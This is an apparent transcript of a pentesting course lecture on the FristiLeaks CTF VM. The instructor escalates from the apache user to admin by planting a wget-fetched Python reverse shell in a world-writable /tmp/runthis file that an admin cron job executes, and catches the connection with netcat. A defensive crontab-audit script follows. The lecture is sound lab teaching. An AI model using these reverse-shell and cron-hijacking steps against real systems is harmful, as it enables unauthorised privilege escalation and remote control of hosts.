In this course, we solve a vulnerable virtual machine called FristiLeaks in order to explore pentesting and privilege escalation techniques.
Hi. Within this lecture, we're going to see what we can do to escalate our privileges, because we are currently in the server as user apache, and we're going to see what we can do to make our way up. So, what I'm going to do, I'm going to, of course, cat the /etc/passwd to start.
And here we have the root, of course. And let's see what we can see over here. We have the apache, which is where we are currently in. And we have eezeepz, and we have various users over here: we have eezeepz, we have admin, we have fristigod and we have fristi itself. So, I don't know, maybe we're going to see every one of those. Maybe we're going to just jump right into some of those and make our way up from there. So, I'm going to cat the /etc/issue to see if we get any kind of description over here. So, no, we just see the goal and the IP address over there. So, let's see what else we can get over here. So, I'm going to try to go into the users, and let me see where we are; we are in the root right now. If we run ls -la, we can see the current folders and files that are available to us. Let's see if we can go to root. I'm going to say cd root; of course, we cannot do that. Maybe we can go to some other user's folder, maybe we can find some kind of lead over there. So, I'm going to go to home, and as you can see, in the home we have admin, eezeepz, and fristigod. So, I'm going to go into admin. I cannot do that. I'm going to go into eezeepz, and here we go, we can do that. And if we run ls, we have a lot of files and folders over here apparently. We have MAKEDEV; let me run ls -la and see it in a better way. So, over here in the eezeepz, we have some kind of hidden files and folders over there and here. And we have, I believe, some kind of binaries as well, like chmod, chown. Let's see, we have kill, nano, and we have notes.txt, which is good because we can read it, I believe. I'm looking for permissions. I'm going to cat the notes.txt, and here you go. It says: Yo EZ, I made it possible for you to do some automated checks. I did only allow your access to /usr/bin/* system binaries. So, we can run some binaries in the /usr/bin folder, which is good.
I did however copy a few extra often needed commands to my home directory, which are chmod, df, cat, echo, ps, grep and so many more. Great. Don't forget to specify the full path for each binary. So, we can actually use those binaries in order to create a reverse shell, I believe. And we have a big tip over here which says that just put a file called 'runthis' in the /tmp/, each line one command. So, we have to specify one line over here to run those binaries, as far as I understand. So, we can run some binaries as admin user, but we have to create a file in order to do that. But we cannot cd into that folder, so I believe we're going to have to see what kind of things we have over there by running ls -la or something like that. Let's see if we can cat the notes.txt using this. No, we cannot do that. Even though they copied these binaries into the admin folder, we cannot directly reach it, we cannot directly execute them. So, if we could have done that, then it would have made our way easier because we can run some binary commands, but there is a way to do that.
It says that just put a file called "runthis" in /tmp/ and each line should include one command. Then the output goes to the file "cronresult" in the /tmp/ and it should run every minute with my account privileges. So, there is a crontab going on over here, a cronjob. And in that cronjob, it runs the "runthis" file every minute. And if we can specify one line over there to run a binary in an unprivileged escalated privilege mode, then we can get a reverse shell back to us, then we can be admin user. I don't know if it will lead us to the root, but most probably it will, and it's the administrator user, maybe we can actually go into the root by not doing so many things later on. So, I'm going to do exactly like instructed over here. First of all, I'm going to see what kind of binaries are under the /usr/bin to see if we can run Python, for example. Let me see if we can run Python and here you go, I lost the shell. Of course, in order to gain the shell, I'm going to run nc -nvlp 1234 one more time, and I'm going to have to go into the Firefox and run this PHP reverse shell one more time, and let's see if we can get this over here. So, 10.0.2.16 and uploads/shell.php.png. Here we go, I believe it works. Here we go, I have the shell one more time. So, great, I don't know if we have the Python or not. So, I'm going to run ls and I'm going to go into the home folder one more time and into the eezeepz. To see that note one more time, I'm going to run ls -la, here we go. I'm going to cat the notes.txt and here we are. So far, I tried to see if we have Python over here and I failed to do that. So, we're going to have to take a different route over here. And first of all, I really need to see what kind of thing that I should put into the "runthis" file. So, I'm going to try ls -la into this /usr/bin and see what kind of things that we have over there. And if we can have Python running over here, then we're going to try that.
So, what I'm going to do, I'm going to ls -la into the /usr/bin and see all the available binaries for me. So, write ls -la /usr/bin. Here we go, I believe we managed to see that and we have a lot of things going on over here. As you can see, we have a lot of binaries inside of our server and I think we should do grep because it will take some time to find it from here. So, I'm going to say ls -la /usr/bin and I'm going to pipe this into grep and I'm going to grep the Python. And here we have the Python. I believe we only have Python 2, but it's okay, because we have the reverse shell codes for Python 2 in the pentestmonkey, we can leverage that. And if we can make this work, then I can just create a "runthis" file and say use the python and just execute this file, for example. So, I'm going to go for the pentestmonkey one more time and I'm going to search for python reverse shell cheat sheet like we have done before. I'm going to open the pentestmonkey. And if you cannot go into the pentestmonkey, by the way, you can just use what I'm using. You can just type the Python commands. I believe by now you see how this works. So, let's open a new tab and do this in the local and we can just do this under the Fristileaks folder. I'm going to open nano pythonshell.py over here. So, I'm going to paste this thing in, and since this is a one-liner, we can just put this into the "runthis" folder as well, but it won't know how to run the python from the user binary. So, what I'm going to do, I'm just going to turn this into a regular Python code as we have done before. I'm going to import the library socket, subprocess and the operating system libraries over here. So, I'm going to define the socket as s. So, this is how the socket works, as you might remember, and over here, I'm just going to give my own IP address and we need to change the port here as well because we have used the 1234.
I'm going to make it 5555, but you can just use any port that you want that is not currently in use. So, I'm coming over here to delete the semicolons because we don't need them in a regular Python code, and here we go. So, it will give us some sh shell and I'm going to delete those things as well. So, here we go, our Python code is ready. If you want, you can just pause this video and write it on your own. Make sure you write exactly like what you have seen over there. So, let me cat this and here we go. So, I'm going to take this and put it into my web server over here. In my /var/www/html folder. So, /var/www/html. So, copy that thing. So, I'm going to run my apache server like we have done before.
So I have a pythonshell.py in my apache server. So, what I'm going to do, I'm going to just use wget over here, and as you can see, we have the wget. So, I'm going to go under cd /tmp because that's where we should actually execute this. As you can see in the /tmp/, we don't have anything right now, but we're going to have soon if I run this correctly. So, wget http://10.0.2.4 for me; write your own IP address over here in order to test this and just write the thing that you have just copied, and here we go. I managed to download the python shell in my server. So, I'm going to run cat on this and here we go, we have the python shell. So, rather than trying to run this python shell over here, we can actually run this python shell right now, but it will give us the shell as the current user that we are in, as in, I believe, the apache user. In order to get this in a privileged way, in an escalated privileged way, we need to make this run with the cronjob it was talking about so that it can run as admin user. So, what we're going to do, we're going to do as instructed before. We're going to have to create a "runthis" file, and in that "runthis" file, we have to specify something. So, in order to do that, I'm going to just run echo and say /usr/bin/python. So, it's going to use the python over here under the user bin folder, and it's going to execute the /tmp/pythonshell.py, and don't forget to place a space between them. And I'm going to output this into a file called runthis, and since we are currently in the /tmp/ folder, we can just execute this over here. I'm going to run this and it will be run within one minute, I believe. As you can see, if you run ls -la, we can see this. If you run cat runthis, it will just run this command, and it also complies with the one line rule as well. So, I'm going to say nc -nvlp 5555 over here and within one minute it should get executed. Let me run ls -la one more time.
As you can see, this will create something called, I believe, resultcron or something like that, and once we see that, it will mean that it gets executed in a regular way. Let's see how this thing was called; let me come over here to the top and see if we can get the note back, and it will pass some time as well. Here we go, it will just create a file called cronresult in the /tmp. So, if you see the cronresult, it means that it got executed. So, this is not a rule in a regular server, this is the rule that our CTF made possible. So, if I run ls -la, here we go, we see the cronresult. Let me go back and here we go. We have the sh shell, so if we run whoami, we are admin right now. So, we managed to become admin, but I believe we are not currently root, so we cannot go and be root directly. So, let me cat the /etc/passwd over here. We can see the root, we can see the admin, but there are a couple of other users here as well. So, we might take a look at those ones as well in the upcoming lecture.
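The note in eezeepz's home directory describes the misconfiguration that makes this escalation work: a cron job running as admin executes whatever is in /tmp/runthis, a file any local user can create. As an added example (not part of the course material or the VM), here is a small Python audit a defender can run against system crontab lines to flag entries whose commands reference files or directories an unprivileged user could control. The crontab lines in demo() are constructed samples; the /tmp/runthis entry is modelled on the note, not copied from the VM's real crontab.

```python
"""Audit system crontab lines for commands that read or execute files an
unprivileged local user could plant or modify.  This is the pattern behind
the FristiLeaks cron job: a job running as admin consumes /tmp/runthis every
minute, so whoever can write to /tmp chooses what admin executes.

Added example for this lecture, not part of the course material.  The
crontab lines in demo() are constructed samples, not taken from the VM."""
import os
import re
import stat
import tempfile

# System crontab layout: five schedule fields, a user name, then the command.
SYSTEM_CRON_RE = re.compile(
    r"^\s*(?P<sched>(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")
# Absolute paths inside the command part (scripts, arguments, redirect targets).
PATH_RE = re.compile(r"(?<![\w-])/[\w./-]+")
# Directories any local user can create files in.  The sticky bit only protects
# files that already exist, not names nobody has created yet.
UNTRUSTED_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def path_risk(path):
    """Return a reason string if an unprivileged user could control `path`,
    or None if nothing obviously wrong was found."""
    try:
        st = os.stat(path)
    except OSError:
        st = None
    if st is not None and st.st_mode & stat.S_IWOTH:
        return "file is world-writable"
    if any(path == d or path.startswith(d + "/") for d in UNTRUSTED_DIRS):
        return "lives under a world-writable temp directory"
    if st is None:
        # The job references a file that does not exist yet: anyone who can
        # write to the parent directory gets to create it.
        parent = os.path.dirname(path) or "/"
        try:
            if os.stat(parent).st_mode & stat.S_IWOTH:
                return "missing; parent directory is world-writable"
        except OSError:
            pass
    return None


def audit_cron_lines(lines):
    """Return (user, command, path, reason) for every risky path referenced by
    a system-crontab line.  Comments, blank lines and VAR=value lines are skipped."""
    findings = []
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if re.match(r"^\s*\w+=", line):
            continue
        m = SYSTEM_CRON_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd").strip()
        for path in PATH_RE.findall(cmd):
            reason = path_risk(path)
            if reason:
                findings.append((m.group("user"), cmd, path, reason))
    return findings


def demo():
    """Run the audit over constructed sample lines modelled on the note in the
    eezeepz home directory (sample data, not a real host's crontab)."""
    sample = [
        "# constructed sample /etc/crontab",
        "SHELL=/bin/sh",
        "* * * * * admin /bin/sh /tmp/runthis > /tmp/cronresult 2>&1",
        "0 3 * * * root /usr/bin/wc -l /etc/passwd",
    ]
    return audit_cron_lines(sample)


def demo_world_writable_file():
    """Show the permission check on its own: a script with mode 0666 is flagged
    wherever it lives.  Creates and removes a scratch file."""
    fd, script = tempfile.mkstemp(suffix=".sh")
    os.close(fd)
    try:
        os.chmod(script, 0o666)
        return path_risk(script)
    finally:
        os.remove(script)


if __name__ == "__main__":
    for user, cmd, path, reason in demo():
        print(f"[{user}] {path}: {reason}\n    {cmd}")
```

On the sample input the admin job is reported twice, once for the script it executes and once for the redirect target, while the root job that only touches root-owned paths produces nothing. To use it on a real host, feed it the lines of /etc/crontab and the files under /etc/cron.d (per-user crontabs in /var/spool/cron have no user field and would need the regex adjusted). The fix for a finding like the FristiLeaks one is to move the job's input to a directory owned by the job's user with no write access for others, rather than to keep polling a world-writable location.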
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.